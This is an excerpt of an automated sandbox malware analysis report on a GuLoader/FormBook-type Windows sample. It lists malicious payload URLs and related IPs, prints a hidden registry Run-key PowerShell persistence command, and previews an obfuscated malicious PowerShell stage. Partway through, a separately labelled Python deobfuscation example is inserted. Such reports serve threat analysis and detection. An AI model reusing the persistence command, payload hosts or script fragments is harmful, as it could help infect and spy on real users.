https://kraljevikonaci.rs/ETfFmOW246.bin5? | Overfondle.exe, 00000008.00000003.2065581113.0000000004487000.00000004.00000020.00020000.00000000.sdmp; Overfondle.exe, 00000008.00000003.2065735532.000000000447B000.00000004.00000020.00020000.00000000.sdmp; Overfondle.exe, 00000008.00000003.2063617167.000000000448A000.00000004.00000020.00020000.00000000.sdmp; Overfondle.exe, 00000008.00000002.2170621912.000000000448A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://contoso.com/License | powershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://kraljevikonaci.rs/ | Overfondle.exe, 00000008.00000003.2065621481.0000000004465000.00000004.00000020.00020000.00000000.sdmp | false | Virustotal: 4%; Avira URL Cloud: malware | unknown
https://contoso.com/Icon | powershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.ftp.ftp://ftp.gopher. | Overfondle.exe, 00000008.00000001.1889349329.0000000000649000.00000020.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.n-benriya002.com | rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000002.2616564781.0000000002DE1000.00000040.80000000.00040000.00000000.sdmp | false | Virustotal: 3%; Avira URL Cloud: safe | unknown
https://kraljevikonaci.rs/ETfFmOW246.binY | Overfondle.exe, 00000008.00000002.2170479484.000000000441A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://nsis.sf.net/NSIS_ErrorError | SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe, Overfondle.exe.2.dr | false | | high
https://www.ecosia.org/newtab/ | cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.2064998955.00000000053D6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | Overfondle.exe, 00000008.00000001.1889349329.00000000005F2000.00000020.00000001.01000000.0000000A.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_Error | SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe, Overfondle.exe.2.dr | false | | high
https://aka.ms/pscore6lB | powershell.exe, 00000002.00000002.2064998955.0000000005281000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | Overfondle.exe, 00000008.00000001.1889349329.0000000000649000.00000020.00000001.01000000.0000000A.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | Overfondle.exe, 00000008.00000001.1889349329.00000000005F2000.00000020.00000001.01000000.0000000A.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://kraljevikonaci.rs/ETfFmOW246.bins | Overfondle.exe, 00000008.00000002.2170479484.000000000441A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2064998955.0000000005281000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
219.94.128.41 | n-benriya002.com | Japan | 9371 | SAKURA-CSAKURAInternetIncJP | false
195.252.110.253 | kraljevikonaci.rs | Serbia | 6700 | BEOTEL-AShttpwwwbeotelnetRS | false
217.160.0.183 | www.jt-berger.store | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | false
112.175.50.218 | ejbodyart.com | Korea Republic of | 4766 | KIXS-AS-KRKoreaTelecomKR | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1431789
Start date and time: 2024-04-25 19:23:11 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 17s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@17/13@4/4
EGA Information:
• Successful, ratio: 60%
HCA Information:
• Successful, ratio: 87%
• Number of executed functions: 85
• Number of non-executed functions: 264
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7656 because it is empty
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
19:24:15 | API Interceptor | 44x Sleep call for process: powershell.exe modified
19:25:26 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Hakkebrttet %elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)
19:25:35 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Hakkebrttet %elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)
19:26:11 | API Interceptor | 6x Sleep call for process: cmd.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
219.94.128.41 | 1704202412475.EXE.exe | malicious | FormBook, GuLoader | www.n-benriya002.com/9pdo/
219.94.128.41 | S#U0130PAR#U0130S_0433.exe | malicious | FormBook, GuLoader | www.n-benriya002.com/9pdo/
219.94.128.41 | 16042024124528724.exe | malicious | FormBook, GuLoader | www.n-benriya002.com/9pdo/
219.94.128.41 | 160420241245287.exe | malicious | FormBook, GuLoader | www.n-benriya002.com/9pdo/
219.94.128.41 | 2024164846750.exe | malicious | FormBook, GuLoader | www.n-benriya002.com/9pdo/
219.94.128.41 | S#U0130PAR#U0130S_0453.exe | malicious | FormBook, GuLoader | www.n-benriya002.com/9pdo/
219.94.128.41 | 2024041342836038.EXE.exe | malicious | FormBook, GuLoader | www.n-benriya002.com/9pdo/
219.94.128.41 | 202404153836038.EXE.exe | malicious | FormBook, GuLoader | www.n-benriya002.com/9pdo/
219.94.128.41 | zamowienie_002523.exe | malicious | FormBook, GuLoader | www.n-benriya002.com/9pdo/
195.252.110.253 | 179XakWwrt2H1Xx.exe | malicious | AgentTesla |
195.252.110.253 | REMITTANCE ADVICE IF01200022823418 Match 2024.exe | malicious | AgentTesla |
195.252.110.253 | POTWIERDZENIE_TRANSAKCJI_20240418145856.exe | malicious | GuLoader |
195.252.110.253 | Invptapayment19032024.exe | malicious | AgentTesla |
217.160.0.183 | 1704202412475.EXE.exe | malicious | FormBook, GuLoader | www.jt-berger.store/9pdo/
217.160.0.183 | 16042024124528724.exe | malicious | FormBook, GuLoader | www.jt-berger.store/9pdo/
217.160.0.183 | S#U0130PAR#U0130S_0433.exe | malicious | FormBook, GuLoader | www.jt-berger.store/9pdo/
217.160.0.183 | 16042024124528724.exe | malicious | FormBook, GuLoader | www.jt-berger.store/9pdo/
217.160.0.183 | 160420241245287.exe | malicious | FormBook, GuLoader | www.jt-berger.store/9pdo/
217.160.0.183 | 16042024124521.exe | malicious | FormBook, GuLoader | www.jt-berger.store/9pdo/
217.160.0.183 | 2024164846750.exe | malicious | FormBook, GuLoader | www.jt-berger.store/9pdo/
217.160.0.183 | S#U0130PAR#U0130S_0453.exe | malicious | FormBook, GuLoader | www.jt-berger.store/9pdo/
217.160.0.183 | 2024041342836038.EXE.exe | malicious | FormBook, GuLoader | www.jt-berger.store/9pdo/
217.160.0.183 | 202404153836038.EXE.exe | malicious | FormBook, GuLoader | www.jt-berger.store/9pdo/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
kraljevikonaci.rs | POTWIERDZENIE_TRANSAKCJI_20240418145856.exe | malicious | GuLoader | 195.252.110.253
www.jt-berger.store | 1704202412475.EXE.exe | malicious | FormBook, GuLoader | 217.160.0.183
www.jt-berger.store | 16042024124528724.exe | malicious | FormBook, GuLoader | 217.160.0.183
www.jt-berger.store | S#U0130PAR#U0130S_0433.exe | malicious | FormBook, GuLoader | 217.160.0.183
www.jt-berger.store | 16042024124528724.exe | malicious | FormBook, GuLoader | 217.160.0.183
www.jt-berger.store | 160420241245287.exe | malicious | FormBook, GuLoader | 217.160.0.183
www.jt-berger.store | 16042024124521.exe | malicious | FormBook, GuLoader | 217.160.0.183
www.jt-berger.store | 2024164846750.exe | malicious | FormBook, GuLoader | 217.160.0.183
www.jt-berger.store | S#U0130PAR#U0130S_0453.exe | malicious | FormBook, GuLoader | 217.160.0.183
www.jt-berger.store | 2024041342836038.EXE.exe | malicious | FormBook, GuLoader | 217.160.0.183
www.jt-berger.store | 202404153836038.EXE.exe | malicious | FormBook, GuLoader | 217.160.0.183
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| KIXS-AS-KR KoreaTelecom KR | WwKYOW4jIg.elf | malicious | Mirai | 222.112.186.45 |
| | tw7rloKDkG.elf | malicious | Mirai | 175.219.70.176 |
| | ZcOjro0Chh.elf | malicious | Mirai | 14.32.5.202 |
| | uqGHhft2DO.elf | malicious | Mirai | 183.127.235.108 |
| | 5RiFmXTOMp.elf | malicious | Mirai | 175.216.85.211 |
| | Hs97Nxxy5u.elf | malicious | Mirai | 175.250.196.247 |
| | sBgS8t0K7i.elf | malicious | Mirai | 211.34.203.16 |
| | n0CEgmtnuf.elf | malicious | Mirai | 221.160.166.181 |
| | bUuAPqXmkL.elf | malicious | Mirai | 59.26.88.68 |
| | oVOImRIAaz.elf | malicious | Mirai | 211.113.104.170 |
| ONEANDONE-AS Brauerstrasse48 DE | Hs97Nxxy5u.elf | malicious | Mirai | 82.165.9.224 |
| | WzfUKCEskB.elf | malicious | Chaos | 77.68.37.125 |
| | PO0424024.exe | malicious | FormBook, PureLog Stealer | 213.171.195.105 |
| | shipping document.exe | malicious | FormBook, PureLog Stealer | 217.160.0.111 |
| | Zapytanie ofertowe (7427-23 ROCKFIN).exe | malicious | AgentTesla, DarkTortilla | 213.165.67.118 |
| | INQ No.KP-50-000-PS-IN-INQ-0027.exe | malicious | FormBook | 217.76.128.34 |
| | https://lamerelea.com/ | malicious | Unknown | 217.160.0.59 |
| | Gq7FlDf6cE.elf | malicious | Mirai | 217.174.247.147 |
| | Signed Proforma Invoice 3645479_pdf.vbs | malicious | FormBook | 217.160.0.95 |
| | https://recouvrement-assurance.fr/LKeZL | malicious | Unknown | 82.165.105.163 |
| SAKURA-C SAKURAInternetInc JP | https://www.ne16.com/t/4177044/70602841/2927387/1/124665/?f8785874=aHR0cHM6Ly93b29kLWRlY2sub3JnL3BkZi85SWRac1p5aTJEeWh3ZUcvYTFmM2IxODIyN2RiNTc4NjIzOGE2ZTc0NTE3YWQ4MDEvWEM4YXAvYTFmM2IxODIyN2RiNTc4NjIzOGE2ZTc0NTE3YWQ4MDEvWTJOc1lYSmxRR0psYkd4d1lYSjBibVZ5YzJsdVl5NWpiMjA9 | malicious | HTMLPhisher | 183.90.245.33 |
| | YKLjlQEZKY.elf | malicious | Mirai | 182.49.45.94 |
| | jdsfl.arm.elf | malicious | Mirai | 182.49.45.90 |
| | QXeoSsX87R.elf | malicious | Gafgyt, Mirai | 157.112.148.28 |
| | http://t.cm.morganstanley.com/r/?id=h1b92d14%2C134cc33c%2C1356be32&p1=www.saiengroup.com%2Fteaz%2F648c482b60b3906833c9304bab170add%2FJBVNhz%2FYW15LmNoZW5AZG91YmxlbGluZS5jb20= | malicious | HTMLPhisher | 120.136.14.8 |
| | 1704202412475.EXE.exe | malicious | FormBook, GuLoader | 219.94.128.41 |
| | S#U0130PAR#U0130S_0433.exe | malicious | FormBook, GuLoader | 219.94.128.41 |
| | 16042024124528724.exe | malicious | FormBook, GuLoader | 219.94.128.41 |
| | 160420241245287.exe | malicious | FormBook, GuLoader | 219.94.128.41 |
| | https://ruv80zbas1.execute-api.us-east-1.amazonaws.com/prod/jump?redirect_url=http://bs-nakagawa.com/PMxdv77xgwVSyGqqOWzi/62df5bbd4291fb27f637dee413562c6e/bWljaGFlbC5jaHVAbGNhdHRlcnRvbi5jb20=&creative_id=601&tag_name=Rob_A_Facebook&operative_id=33090 | malicious | HTMLPhisher | 183.90.246.80 |
| BEOTEL-AS httpwwwbeotelnet RS | 179XakWwrt2H1Xx.exe | malicious | AgentTesla | 195.252.110.253 |
| | REMITTANCE ADVICE IF01200022823418 Match 2024.exe | malicious | AgentTesla | 195.252.110.253 |
| | POTWIERDZENIE_TRANSAKCJI_20240418145856.exe | malicious | GuLoader | 195.252.110.253 |
| | BNuwexy0tz.elf | malicious | Mirai | 62.193.212.122 |
| | ydlkilluNn.elf | malicious | Gafgyt, Mirai | 62.108.98.143 |
| | AMjH2Tev6H.elf | malicious | Mirai, Gafgyt | 62.108.98.156 |
| | LmRWdFDFaQ.elf | malicious | Mirai, Gafgyt | 62.108.98.132 |
| | mUP7fvcqLi.elf | malicious | Mirai | 62.108.98.133 |
| | bgj2URl5B2.elf | malicious | Mirai, Okiru | 195.252.91.201 |
| | Invptapayment19032024.exe | malicious | AgentTesla | 195.252.110.253 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| 37f463bf4616ecd445d4a1937da06e19 | ProconGO1121082800.LnK.lnk | malicious | Unknown | 195.252.110.253 |
| | file.exe | malicious | Clipboard Hijacker, RisePro Stealer | 195.252.110.253 |
| | Version.125.7599.75.js | malicious | SocGholish | 195.252.110.253 |
| | Database4.exe | malicious | Unknown | 195.252.110.253 |
| | lzShU2RYJa.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | 195.252.110.253 |
| | XV9q6mY4DI.exe | malicious | Babuk, Djvu | 195.252.110.253 |
| | n8XBpFdVFU.exe | malicious | Babuk, Djvu, Vidar | 195.252.110.253 |
| | R5391762lf.exe | malicious | Clipboard Hijacker, Djvu, Vidar | 195.252.110.253 |
| | Swift Payment.bat | malicious | AgentTesla, GuLoader | 195.252.110.253 |
| | file.exe | malicious | Vidar | 195.252.110.253 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll | https://www.inputdirector.com/downloads.html | malicious | Unknown | |
| | Arkopa Ahsap Panel San. A.S.#3152.exe | malicious | GuLoader, Remcos | |
| | Arkopa Ahsap Panel San. A.S.#3152.exe | malicious | GuLoader | |
| | Arkopa Ahsap Panel San. A.S.#3152.exe | malicious | GuLoader, Remcos | |
| | Arkopa Ahsap Panel San. A.S.#3152.exe | malicious | GuLoader | |
| | GR&_T._Ekstralam_Proorma_1&_7687429--&.exe | malicious | GuLoader, Remcos | |
| | GR&_T._Ekstralam_Proorma_1&_7687429--&.exe | malicious | GuLoader | |
| | maalesteder.exe | malicious | Remcos, GuLoader | |
| | maalesteder.exe | malicious | GuLoader | |
| | RFQ_Quote.PDF.exe | malicious | Unknown | |
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:modified
                                                                      Size (bytes):8003
                                                                      Entropy (8bit):4.838950934453595
                                                                      Encrypted:false
                                                                      SSDEEP:192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
                                                                      MD5:4C24412D4F060F4632C0BD68CC9ECB54
                                                                      SHA1:3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
                                                                      SHA-256:411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
                                                                      SHA-512:6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1211596417522893
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                                      MD5:0AB67F0950F46216D5590A6A41A267C7
                                                                      SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                                      SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                                      SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):75468
                                                                      Entropy (8bit):5.213840255922679
                                                                      Encrypted:false
                                                                      SSDEEP:1536:t9Sm33eWjr3xQ0/weIUAFyajOq3Nn6Ot/s/z5poetn8kcFH30aS7deqQx+:tTXKY1OZt/s/zw+8kckaSReqQg
                                                                      MD5:2A4D239948B7BA6C05B6DC3D6A4BD41D
                                                                      SHA1:CE9C6D7CABFA263B0AF02023BEAA4938D2DBA4F5
                                                                      SHA-256:490FAFE9835E76B1780427BDFC6F32529D04C81630A5678C6AF77B3D46A0276A
                                                                      SHA-512:D7205FD1293ABA4310773546C50DA78D0F9C0FF37DFC0EFBCC9928666A556DCA634C0EC9DBC01F70BF5CB071C547BEE36A1BE40FF705A55D41885FBBD1457A57
                                                                      Malicious:true
                                                                      Preview:$Plasmapheresis=$Kirkegaardslederes;<#Pantophobous inspektioner revaccinations #><#Peragration Antineutrinos Didactic Gainfulness Bevbning Kvidres #><#Labiovelar Brisbane Cubaneres Bazooms Darwinist Prefearfully #><#Aandsliv Sulfoxylate Proclivity Aspersory #><#Aleksandrineren Klaverstemmere Wharf Opfedede Vandbassin Fezziwig #><#Teknikkerne Hamiltonism Ultimo approksimativ Senneps Strejkevarslers Bossily #><#Kommandodele Terrorgruppens Fremontia Dunstedes #><#Klede Knudredes Kartoffelprodukter Urineret Bookrests Frottage Lotuko #><#Jongleringens Menyie Polypean #><#Udvandringers Cadeauerne Osgiliath Imperfectivity Uddannelsesaktiviteterne Delnoeglen Provoens #><#Udpibendes Troldkarlene Protegeerne #><#Sigjnersken Earthshaking Julende sieva #><#Sukkerkugler Hinnying Doless #><#Knivsbjergs Semimade Jalousiskabs #><#Rveskindspelse Kibitzing Feltmssig Microsoma Unlaborables #><#Ugemagasinerne Befaestet Aktuelles Hjertespand Sallowed #><#Letlbende Funktionsforskrift Krampetrkningernes Smre
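The 75468-byte single-line text file above is a PowerShell stage in which `<# ... #>` block comments stuffed with dictionary words are interleaved between the real statements, which is why its entropy sits near that of plain prose while the actual logic is a small fraction of the bytes. The first thing an analyst does with such a stage is strip the comments so the statement sequence can be read. The following is an added example, not code from the report or from the sample; `SAMPLE` is a constructed snippet that imitates the preview (it is not the real dropped file), and the tokenizer deliberately handles only `<# #>` blocks, `#` line comments and single/double-quoted strings (here-strings are not handled, and any `#` outside a string is treated as a comment start, which is slightly more aggressive than PowerShell's own tokenizer).

```python
# Constructed stand-in for the dropped stage previewed in the report.
# The real file is one 75468-byte line; this keeps the same shape.
SAMPLE = (
    "$Plasmapheresis=$Kirkegaardslederes;"
    "<#Pantophobous inspektioner revaccinations #>"
    "<#Peragration Antineutrinos Didactic Gainfulness Bevbning Kvidres #>"
    "$Stage='Ingen#kommentar';"
    "<#Labiovelar Brisbane Cubaneres Bazooms Darwinist Prefearfully #>"
    "$Len=$Stage.Length # trailing line comment\n"
    "$Last=\"done\""
)


def strip_ps_comments(src: str) -> str:
    """Drop <# ... #> block comments and # line comments, copying quoted
    strings through untouched so a '#' inside a string survives."""
    out = []
    i, n = 0, len(src)
    while i < n:
        c = src[i]
        if src.startswith("<#", i):
            end = src.find("#>", i + 2)
            if end == -1:               # unterminated block: rest is comment
                break
            i = end + 2
        elif c == "#":
            nl = src.find("\n", i)      # keep the newline, it ends a statement
            i = n if nl == -1 else nl
        elif c in ("'", '"'):
            j = i + 1
            while j < n:
                if c == '"' and src[j] == "`":      # backtick escape in "..."
                    j += 2
                    continue
                if src[j] == c:
                    if j + 1 < n and src[j + 1] == c:   # doubled quote escape
                        j += 2
                        continue
                    break
                j += 1
            out.append(src[i:j + 1])
            i = j + 1
        else:
            out.append(c)
            i += 1
    return "".join(out)


def split_statements(code: str) -> list:
    """Split comment-free code on ';' and newlines that lie outside quotes.
    A doubled quote inside a string toggles the state twice, which is fine
    for splitting purposes."""
    stmts, cur, quote = [], [], None
    for ch in code:
        if quote:
            cur.append(ch)
            if ch == quote:
                quote = None
        elif ch in ("'", '"'):
            quote = ch
            cur.append(ch)
        elif ch in ";\n":
            s = "".join(cur).strip()
            if s:
                stmts.append(s)
            cur = []
        else:
            cur.append(ch)
    s = "".join(cur).strip()
    if s:
        stmts.append(s)
    return stmts


def deobfuscate(src: str) -> dict:
    """Return the real statement list and how much of the file was padding."""
    stripped = strip_ps_comments(src)
    ratio = 1.0 - len(stripped) / len(src) if src else 0.0
    return {"statements": split_statements(stripped), "comment_ratio": ratio}


if __name__ == "__main__":
    result = deobfuscate(SAMPLE)
    print(f"comment padding: {result['comment_ratio']:.0%}")
    for stmt in result["statements"]:
        print("  ", stmt)
```

Running this against the real dropped file (read as text) gives the variable-shuffling and decode statements in order; the comment ratio is a useful triage number on its own, since legitimate scripts rarely exceed a few percent of comment bytes.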
                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):318271
                                                                      Entropy (8bit):7.692725386800131
                                                                      Encrypted:false
                                                                      SSDEEP:6144:4KOElsUFum7Cl2KOnFQfSIYTgcpHZHN2wB7FHe//pXFM8O:NOElhFumRbnFQYTZZUwVFH6XFA
                                                                      MD5:B5464E0D8950A57546E96BB94F6C2CF1
                                                                      SHA1:B31D124005D806419ADFB7F2F055F959C406B97A
                                                                      SHA-256:795E6773D208F28D17AE68B6A0D793A568B306764666702BB9591FAF0FB85EC2
                                                                      SHA-512:F10BC9334F3B4AFA3D58AD7F87D0C6874DCACB3B2EABC1F5AE047AE786FE4C7C0E79EE7FD44640202AB0CB0E244E67BC038A3F2173A729FEED3090F8E6D9F3EC
                                                                      Malicious:false
                                                                      Preview:................)))...............................{............!.....................o.zzzz.......[[[.......................l.............;...~~~~~~......d........ ......................................p...D..................o.....{{...........7...............`.....2...OO.W......d........f..^^^.W....}}}}}}......(.""..V.<<.}}}........t..........!.................................R.H.....Q........................................................o.....z....mmm....%.....................Z......PPP............1.....jj.Q...bb.....F.f.n...................BBBB...................@@@......E./.........................$.........::...................pp........ss.......vvv.................LL......r..f..ppppppp...333.???......................o..ZZZ..........<.....iiii.....................................................................$.N........K...3......S....q..0....TT.**...........................k................y.........x......UUU......................--......>>>>................:.????..........
                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):331
                                                                      Entropy (8bit):4.273871704234191
                                                                      Encrypted:false
                                                                      SSDEEP:6:FhQqEX1PFai+7DFv7VFqYA0LD26kWVNALRVzKMvCRMnbIOBK8AVQAXJ:Ax1PFaiyDFvmYAR6tALRVdCRMzyVQAXJ
                                                                      MD5:7CB24DDED50A9F89BB5D62F961802F20
                                                                      SHA1:2F21F643FA1501A90B01CE1702E53C32C0EF56FC
                                                                      SHA-256:D70B7E5A8FDC7AC864455470D282565FE41A3F0937D8F89A85D30BBB93B59F12
                                                                      SHA-512:EF7758A566578EEABE3AD92047F01FBD4D38549D505D943AB1A2AE73BB5A077F53E9A36AB1D0BDD795F560D89AC86EB3AA3BA881AFF1D942BB308BA5217F1675
                                                                      Malicious:false
                                                                      Preview:calamites attabal abefester strikkebgers panaceas transporttidens bynet sjakformndenes..impenetrability draconism keratoma unwan erugos agterstavne.alcazar knickknacks rustsvamp.fellow glden fredningsstyrelserne.mesomorphous x lageroptllinger grano diatomlhernes truckfrernes retteskema,riskiest depart underdanighedens spioneriet,
                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1357
                                                                      Entropy (8bit):4.74845460874173
                                                                      Encrypted:false
                                                                      SSDEEP:24:Z5QlYl0R38zWCYHiwBBSli2q4IW+ZX84qNMKOJNWPL5lMflvnl:14SKBBSA2Ha24qNg4PvMNvl
                                                                      MD5:F4CE6C53FFB5533A5DAB605E98EB4067
                                                                      SHA1:2D1A46B2CF7C902BDC6B5D6FDA59E5EA899949EE
                                                                      SHA-256:B71330891ECC7E46AE3BFF434DCC8659B106415D0EFC2C4D6E61811AC9F58D2F
                                                                      SHA-512:C47BA80C126DA2A527CD090322786C3F0B58FB6C6F285275E60D0B95FAE8804559C242CE8F35CF7A23753624F994B0DDCAF2DC19203B7237DA3B0C45CF6934A9
                                                                      Malicious:false
                                                                      Preview:...D....A.k..+w..A.........C...Ac..........3........z.>es"......p8x......................Kx.]3....7F..y....h..l..%...y...W....i.P..z...4...\...........-x..................9..........Q...ccI0.........................................f....[.......................m..Y.J...&...&.........Rz..a............m..b..v..V'H...N....7...Z...i[......q.E.7'........>...'....C.K..1A.!.............../s.z.. ....b......W............#...........hM.v.....^....%...........)..r..........@.w..&....L.......g.....g......j..............2.5........].....g.$............#".......o....A........$.q&......i.........fE......x.z...x...N...'6..~.\..f.g...i..............".P....X.............)....-.............f..D.(6X....}.............TL.Jb...U.Q..p..+............~z.....................P.4.....(...P..8...................[d.......U......Z.r2.b......?..8.$...C.`...G.G..........m.......................&..+.....Te...e..[.........VO@.M.|.......|............X...O....8.{..$z..............h..............j/E.....z.v*...
                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):2223
                                                                      Entropy (8bit):4.7966671661641005
                                                                      Encrypted:false
